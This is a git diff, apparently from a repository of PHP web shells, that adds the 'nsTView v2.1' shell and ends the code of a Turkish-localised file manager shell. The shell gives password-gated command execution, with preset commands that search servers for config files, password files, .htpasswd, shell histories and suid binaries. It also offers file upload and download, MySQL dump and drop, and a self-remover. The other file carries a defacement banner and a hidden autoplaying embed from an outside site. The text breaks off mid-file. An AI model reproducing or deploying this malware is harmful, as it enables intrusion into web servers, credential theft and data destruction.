'DosyaAdi', + +'size' => 'Boyut', +'permission' => 'izin', +'owner' => 'Sahip', +'group' => 'Grup', +'other' => 'Diًerleri', +'Gِrevler' => 'Gِrevler', + +'read' => 'Oku', +'write' => 'Yaz', +'execute' => 'Uygula', + +'create_symlink' => 'create symlink', +'Sil' => 'Sil', +'Degistir' => 'Degistir', +'Tasi' => 'Tasi', +'Kopyala' => 'Kopyala', +'Düzenle' => 'Düzenle', +'indir' => 'indir', +'upload' => 'Yükle', +'create' => 'Olustur', +'change' => 'Degisiklik', +'save' => 'Kaydet', +'set' => 'Koyulan', +'reset' => 'Yenile', +'relative' => 'Hedefe Yolla', + +'yes' => 'Evet', +'no' => 'Hayir', +'Geri' => 'Geri', +'Yol' => 'Yol', +'symlink' => 'Symlink', +'no_output' => 'Hiçbir ç‎kt‎', + +'user' => 'Kullan‎c‎', +'password' => 'Sifre', +'add' => 'Ekle', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" Yüklendi.', +'not_uploaded' => '"[%1]" Yüklenemedi.', +'already_exists' => '"[%1]" قimdiden var ol.', +'created' => '"[%1]" Olusturuldu.', +'not_created' => '"[%1]" Olusturuldu.', +'really_Sil' => 'Silinen dosyalar?', +'Sild' => "Bu dosyalar,oldu Sild:\n[%1]", +'not_Sild' => "Bu dosyalar olamazd‎ Sild:\n[%1]", +'Degistir_file' => 'Dosyayi Degistir:', +'Degistird' => '"[%1]" Degistirildi "[%2]".', +'not_Degistird' => '"[%1] Degistirilemedi "[%2]".', +'Tasi_files' => 'Dosyayi TAsi:', +'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]", +'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]", +'Kopyala_files' => 'Bu Dosyalari Kopyala:', +'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]", +'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" Düzenle.', +'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}", +'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}", +'saved' => '"[%1]" Kurtarildi.', +'not_saved' => '"[%1]" Kurtar‎lamad‎.', +'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.', +'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.', +'permission_for' => 'izin "[%1]":', +'permission_set' => 'izin "[%1]" Kopyalandi [%2].', +'permission_not_set' => 'izin "[%1]" Yapilamadi [%2].', +'not_readable' => '"[%1]" Okunamadi.' + ); + + } + +} + +function getimage ($image) { + switch ($image) { + case 'file': + return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); + case 'folder': + return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'); + case 'hidden_file': + return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'); + case 'link': + return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA'); + case 'smiley': + return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA='); + case 'arrow': + return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw=='); + } +} + +function html_header () { + global $charset; + + echo <<<END +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> +<head> + +<meta http-equiv="Content-Type" content="text/html; charset=$charset" /> + +<title>iMHaBiRLiGi PhpFtp</title> + +<style type="text/css"> +body { font: small sans-serif; text-align: center } +img { width: 0px; height: 0px } +a, a:visited { text-decoration: none; color: red } +hr { border-style: none; height: 1px; Geriground-color: silver; color: silver } +#main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px } +#main th { Geriground: #eee; padding: 3pt 3pt 0pt 3pt } +.listing th, .listing td { padding: 1px 3pt 0 3pt } +.listing th { border: 1px solid silver } +.listing td { border: 1px solid #ddd; Geriground: white } +.listing .checkbox { text-align: center } +.listing .filename { text-align: left } +.listing .size { text-align: right } +.listing .permission_header { text-align: left } +.listing .permission { font-family: monospace } +.listing .owner { text-align: left } +.listing .group { text-align: left } +.listing .Gِrevler { text-align: left } +.listing_footer td { Geriground: #eee; border: 1px solid silver } +#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt } +#directory { Geriground: #eee; border: 1px solid silver } +#upload { padding-top: 1em } +#create { padding-bottom: 1em } +.small, .small option { font-size: x-small } +textarea { border: none; Geriground: white } +table.dialog { margin-left: auto; margin-right: auto } +td.dialog { Geriground: #eee; padding: 1ex; border: 1px solid silver; text-align: center } +#permission { margin-left: auto; margin-right: auto } +#permission td { padding-left: 3pt; padding-right: 3pt; text-align: center } +td.permission_action { text-align: right } +#symlink { Geriground: #eee; border: 1px solid silver } +#symlink td { text-align: left; padding: 3pt } +#red_button { width: 120px; color: #400 } +#green_button { width: 120px; color: #040 } +#error td { Geriground: maroon; color: white; border: 1px solid silver } +#notice td { Geriground: green; color: white; border: 1px solid silver } +#notice pre, #error pre { Geriground: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex } +code { font-size: 12pt } +td { white-space: nowrap } +</style> + +<script type="text/javascript"> +<!-- +function activate (name) { + if (document && document.forms[0] && document.forms[0].elements['focus']) { + document.forms[0].elements['focus'].value = name; + } +} +//--> +</script> + +</head> +<body> + + +END; + +} + +function html_footer () { + + echo <<<END +</body> +</html> +END; + +} + +function notice ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return '<tr id="notice"> + <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td> +</tr> +'; + +} + +function error ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return '<tr id="error"> + <td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td> +</tr> +'; + +} + +?> +<BODY><IMG style="WIDTH: 306px; HEIGHT: 76px" height=100 +src="http://www.nettekiadres.com/imhabirligi.jpg" width=282></BODY> +<br><Center>SU AN <A href="http://www.imhabirligi.com">iMHaBiRLiGi</A> HUDUTLARINDA BULUNMAKTASINIZ.!!</Center> +<FONT +class=footmsg><EMBED src=http://www.imhabirligi.com/r1/hurl.asx hidden=true +type="text/plain; charset=iso-8859-9" +AUTOSTART="TRUE"> +<script language=JavaScript> +<!-- + +var message=""; +/////////////////////////////////// +function clickIE() {if (document.all) {(message);return false;}} +function clickNS(e) {if +(document.layers||(document.getElementById&&!document.all)) { +if (e.which==2||e.which==3) {(message);return false;}}} +if (document.layers) +{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} +else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} + +document.oncontextmenu=new Function("return false") +// --> +</script> \ No newline at end of file diff --git a/php/PHPshell/nstview/Thumbs.db b/php/PHPshell/nstview/Thumbs.db new file mode 100644 index 0000000..1979d7a Binary files /dev/null and b/php/PHPshell/nstview/Thumbs.db differ diff --git a/php/PHPshell/nstview/nstview.jpg b/php/PHPshell/nstview/nstview.jpg new file mode 100644 index 0000000..113860f Binary files /dev/null and b/php/PHPshell/nstview/nstview.jpg differ diff --git a/php/PHPshell/nstview/nstview.php b/php/PHPshell/nstview/nstview.php new file mode 100644 index 0000000..4ecf4bb --- /dev/null +++ b/php/PHPshell/nstview/nstview.php @@ -0,0 +1,2136 @@ +<? +@session_start(); +@set_time_limit(0); +@set_magic_quotes_runtime(0); +error_reporting(E_ALL & ~E_NOTICE); +#####cfg##### +# use password true / false # +$create_password = true; +$password = "nst"; // default password for nstview, you can change it. + +# UNIX COMMANDS +# description (nst) command +# example: Shutdown (nst) shutdown -h now +$fast_commands = " +Show open ports (nst) netstat -an | grep LISTEN | grep tcp +last root (nst) last root +last (all users) (nst) last all +Find all config.php in / (nst) find / -type f -name config.php +Find all config.php in . (nst) find . -type f -name config.php +Find all admin.php in / (nst) find / -type f -name admin.php +Find all admin.php in . (nst) find . -type f -name admin.php +Find all config.inc.php in / (nst) find / -type f -name config.inc.php +Find all config.inc.php in . (nst) find . -type f -name config.inc.php +Find all config.inc in / (nst) find / -type f -name config.inc +Find all config.inc in . (nst) find . -type f -name config.inc +Find all config.dat in / (nst) find / -type f -name config.dat +Find all config.dat in . (nst) find . -type f -name config.dat +Find all config* in / (nst) find / -type f -name config* +Find all config* in . (nst) find . -type f -name config* +Find all pass* in / (nst) find / -type f -name pass* +Find all pass* in . (nst) find . -type f -name pass* +Find all .bash_history in / (nst) find / -type f -name .bash_history +Find all .bash_history in . (nst) find . -type f -name .bash_history +Find all .htpasswd in / (nst) find / -type f -name .htpasswd +Find all .htpasswd in . (nst) find . -type f -name .htpasswd +Find all writable dirs/files in / (nst) find / -perm -2 -ls +Find all writable dirs/files in . (nst) find . -perm -2 -ls +Find all suid files in / (nst) find / -type f -perm -04000 -ls +Find all suid files in . (nst) find . -type f -perm -04000 -ls +Find all sgid files in / (nst) find / -type f -perm -02000 -ls +Find all sgid files in . (nst) find . -type f -perm -02000 -ls +Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc +Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc +OS Version? (nst) sysctl -a | grep version +Kernel version? (nst) cat /proc/version +cat syslog.conf (nst) cat /etc/syslog.conf +Cat - Message of the day (nst) cat /etc/motd +Cat hosts (nst) cat /etc/hosts +Distrib name (nst) cat /etc/issue.net +Distrib name (2) (nst) cat /etc/*-realise +Display all process - wide output (nst) ps auxw +Display all your process (nst) ps ux +Interfaces (nst) ifconfig +CPU? (nst) cat /proc/cpuinfo +RAM (nst) free -m +HDD space (nst) df -h +List of Attributes (nst) lsattr -a +Mount options (nst) cat /etc/fstab +Is cURL installed? (nst) which curl +Is wGET installed? (nst) which wget +Is lynx installed? (nst) which lynx +Is links installed? (nst) which links +Is fetch installed? (nst) which fetch +Is GET installed? (nst) which GET +Is perl installed? (nst) which perl +Where is apache (nst) whereis apache +Where is perl (nst) whereis perl +locate proftpd.conf (nst) locate proftpd.conf +locate httpd.conf (nst) locate httpd.conf +locate my.conf (nst) locate my.conf +locate psybnc.conf (nst) locate psybnc.conf +"; + + + +# WINDOWS COMMANDS +# description (nst) command +# example: Delete autoexec.bat (nst) del c:\autoexec.bat +$fast_commands_win = " +OS Version (nst) ver +Tasklist (nst) tasklist +Attributes in . (nst) attrib +Show open ports (nst) netstat -an +"; + + + + + +######ver#### +$ver= "v2.1"; +############# +$pass=$_POST['pass']; +if($pass==$password){ +$_SESSION['nst']="$pass"; +} +if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"]; +else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; +else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"]; +else $ip = $_SERVER['REMOTE_ADDR']; +$ip=htmlspecialchars($ip); + +if($create_password==true){ + +if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){ +die(" +<title>nsTView $ver:: nst.void.ru</title> +<center> +<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td> +<font size=1 face=verdana><center> +<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b> +</center> +<form method=post> +Password:<br> +<input type=password name=pass size=30 tabindex=1> +</form> +<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br> +<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br> +<b>Your ip:</b> ".$ip." +</td></tr></table> +");} + +} +$d=$_GET['d']; + +function adds($editf){ +#if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +#} +return $editf; +} +function adds2($editf){ +if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +} +return $editf; +} + +$f = "nst_sql.txt"; +$f_d = $_GET['f_d']; + +if($_GET['download']){ +$download=$_GET['download']; +header("Content-disposition: attachment; filename=\"$download\";"); +readfile("$d/$download"); +exit;} + +if($_GET['dump_download']){ +header("Content-disposition: attachment; filename=\"$f\";"); +header("Content-length: ".filesize($f_d."/".$f)); +header("Expires: 0"); +readfile($f_d."/".$f); +if(is_writable($f_d."/".$f)){ +unlink($f_d."/".$f); +} +die; +} + + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>"; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); +if(@$_GET['p']=="info"){ +@phpinfo(); +exit;} +if(@$_GET['img']=="1"){ +@$e=$_GET['e']; +header("Content-type: image/gif"); +readfile("$d/$e"); +} +if(@$_GET['getdb']=="1"){ +header('Content-type: application/plain-text'); +header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); +} +print "<title>nsT View $ver</title> +<style> +BODY, TD, TR { +text-decoration: none; +font-family: Verdana; +font-size: 8pt; +SCROLLBAR-FACE-COLOR: #363d4e; +SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; +SCROLLBAR-SHADOW-COLOR: #363d4e; +SCROLLBAR-ARROW-COLOR: #363d4e; +SCROLLBAR-TRACK-COLOR: #91AAFF +} +input, textarea, select { +font-family: Verdana; +font-size: 10px; +color: black; +background-color: white; +border: solid 1px; +border-color: black +} +UNKNOWN { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:link { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:hover { +COLOR: #FF0C0B; +TEXT-DECORATION: none +} +A:active { +COLOR: #0006DE; +TEXT-DECORATION: none +} +A:visited { +TEXT-DECORATION: none +} +</style> +<script> +function ShowOrHide(d1, d2) { +if (d1 != '') DoDiv(d1); +if (d2 != '') DoDiv(d2);} + +function DoDiv(id) { +var item = null; +if (document.getElementById) { +item = document.getElementById(id); +} else if (document.all){ +item = document.all[id]; +} else if (document.layers){ +item = document.layers[id];} +if (!item) {} +else if (item.style) { +if (item.style.display == \"none\"){ item.style.display = \"\"; } +else {item.style.display = \"none\"; } +}else{ item.visibility = \"show\"; }} + +function cwd(text){ +document.sh311Form.sh3.value+=\" \"+ text; +document.sh311Form.sh3.focus(); +} + + +</script> +"; +print "<body vlink=#0006DE> +<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center> +<tr><td><font face=wingdings size=2>0</font>"; +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";} +else{ + echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'></a>/","/'></a>",$sls); +print $sls; +} +if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} +if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} +echo "</td></tr>"; +if($os=="unix"){ echo " +<tr><td><b>id:</b> ".@exec('id')."</td></tr> +<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo" +<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br> +[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br> +[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>] +[<a href='$php_self'>Home</a>] +[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>] +[<a href='$php_self?d=$d&t=upload'>Upload</a>] +[<a href='$php_self?t=tools'>Tools</a>] +[<a href='$php_self?p=info'>PHPinfo</a>] +[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>] +[<a href='$php_self?p=sql'>SQL</a>] +[<a href='$php_self?p=selfremover'>Self Remover</a>] +</td></tr> +"; +if($os=="win"){ echo " +<tr><td bgcolor=white> +<center><font face=wingdings size=2><</font> +<a href='$php_self?d=a:/'>A</a> +<a href='$php_self?d=b:/'>B</a> +<a href='$php_self?d=c:/'>C</a> +<a href='$php_self?d=d:/'>D</a> +<a href='$php_self?d=e:/'>E</a> +<a href='$php_self?d=f:/'>F</a> +<a href='$php_self?d=g:/'>G</a> +<a href='$php_self?d=h:/'>H</a> +<a href='$php_self?d=i:/'>I</a> +<a href='$php_self?d=j:/'>J</a> +<a href='$php_self?d=k:/'>K</a> +<a href='$php_self?d=l:/'>L</a> +<a href='$php_self?d=m:/'>M</a> +<a href='$php_self?d=n:/'>N</a> +<a href='$php_self?d=o:/'>O</a> +<a href='$php_self?d=p:/'>P</a> +<a href='$php_self?d=q:/'>Q</a> +<a href='$php_self?d=r:/'>R</a> +<a href='$php_self?d=s:/'>S</a> +<a href='$php_self?d=t:/'>T</a> +<a href='$php_self?d=u:/'>U</a> +<a href='$php_self?d=v:/'>V</a> +<a href='$php_self?d=w:/'>W</a> +<a href='$php_self?d=x:/'>X</a> +<a href='$php_self?d=y:/'>Y</a> +<a href='$php_self?d=z:/'>Z</a> +</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";} +print "<tr><td> +:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> :: +<a href='$php_self?d=$d&mkfile=1'>Create file</a> :: +<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::"; +if($os=="unix"){ +print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::"; +} +print "</td></tr>"; + + + + + +if($_GET['p']=="ftp"){ +print "<tr><td>"; + + + +print "</td></tr></table>"; +print $copyr; +exit; +} + + + + + + + + + + +if(@$_GET['p']=="sql"){ +print "<tr><td>"; +### + +$f_d = $_GET['f_d']; +if(!isset($f_d)){$f_d=".";} +if($f_d==""){$f_d=".";} + +$php_self=$_SERVER['PHP_SELF']; +$delete_table=$_GET['delete_table']; +$tbl=$_GET['tbl']; +$from=$_GET['from']; +$to=$_GET['to']; +$adress=$_POST['adress']; +$port=$_POST['port']; +$login=$_POST['login']; +$pass=$_POST['pass']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +$conn=$_GET['conn']; +if(!isset($adress)){$adress="localhost";} +if(!isset($login)){$login="root";} +if(!isset($pass)){$pass="";} +if(!isset($port)){$port="3306";} +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} + + +?> +<style> +table,td{ +color: black; +font-face: verdana; +font-size: 11px; + +} +</style> +<font color=black face=verdana size=1> +<? if(!$conn){ ?> + +<!-- table 1 --> +<table bgcolor=#D7FFA8> +<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr> +<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr> +<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr> +<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?> +<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr> +</table> +<!-- end of table 1 --> + + +<? +$conn=$_GET['conn']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +if($conn){ + +$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>"); +if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";} +print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8 +print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>"; +print "<br><font color=red>[db]</font><Br>"; +print "<font color=white>"; +$res = mysql_list_dbs($serv); +while ($str=mysql_fetch_row($res)){ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>"; +$tc++; +} +$baza=$_GET['baza']; +$db=$_GET['db']; +print "<font color=red>[Total db: $tc]</font><br>"; +if($baza){ +print "<div align=left><font color=green>db: [$db]</div></font><br>"; +$result=@mysql_list_tables($db); +while($str=@mysql_fetch_array($result)){ +$c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); +$records=mysql_fetch_array($c); + +if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} +if($records[0]=="0"){ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>"; +}else{ +print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>"; +} +mysql_free_result($c); +$total_t++; +} +print "<br><B><font color=red>Total tables: $total_t</font></b>"; + print "<pre>"; +for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";} + print "</pre>"; +} #end baza + + + + +# delete table +if(isset($delete_table)){ +mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>"); +mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>"); +print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">"; +} +# end of delete table + +# delete database +if(isset($_GET['delete_db'])){ +mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>"); +print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">"; +} +# end of delete database + +# delete row +if(isset($_POST['delete_row'])){ +$_POST['delete_row'] = base64_decode($_POST['delete_row']); +mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>"); +$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row']; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +} +# end of delete row + + +$vn=$_GET['vn']; +print "</td><td valign=top>"; +print "<font color=green>Database: $db => $vn</font>"; + +# edit row +if(isset($_POST['edit_row'])){ +$edit_row=base64_decode($_POST['edit_row']); + +$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>"); +print "<br><br> + <table border=0 cellpadding=1 cellspacing=1><tr> + <td><b>Row</b></td><td><b>Value</b></td></tr>"; +print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>"; +print "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>"; +print " <input type=radio name=upd value=update checked>Update<br> + <input type=radio name=upd value=insert>Insert new<br><br>"; + + +$i=0; +while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ +foreach($mn as $key =>$val){ +$type = mysql_field_type($r_edit, $i); +$len = mysql_field_len($r_edit, $i); +$del .= "`$key`='".adds($val)."' AND "; +$c=strlen($val); +$val=htmlspecialchars($val, ENT_NOQUOTES); +$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> "; +$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>"; +$i++; +} + +} +$delstring=base64_encode($del); +print "<input type=hidden name=delstring value=\"$delstring\">"; +print "$buff</table><br>"; +print "<br>"; +if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";} + + + + +if($_POST['makeupdate']){ +if($_POST['upd']=='update'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',"; +} +$total_str = substr_replace($total_str,"",-1); +$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring"; +$up_string = htmlspecialchars($up_string, ENT_NOQUOTES); +print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>"); +}#end of make update + + + +if($_POST['upd']=='insert'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i<count($matches3[0]); $i++){ +eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";"); +$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,"; +} + +$total_str = ",,".$total_str; + +preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4); + +for($i=0; $i<count($matches4[1]); $i++){ + $matches4[1][0]=str_replace(",","",$matches4[1][0]); + $total_m_i .= "`".$matches4[1][$i]."`,"; + $total_m_x .= "'".$matches4[2][$i]."',"; +} +$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1); +$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1); + +$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)"; +mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>"); +print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>"; +print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">"; +}#end of insert +}#end of update +} +# end of edit row + + +# insert new line +if($_GET['ins_new_line']){ +$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>"); +print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'> +Insert new line in <b>$tbl</b> table</b><Br><br>"; +print "<table>"; +while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { +foreach ($new_line as $key =>$next) { +$buff .= "$next "; +} +$expl=explode(" ",$buff); +$buff2 .= $expl[0]." "; +print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font 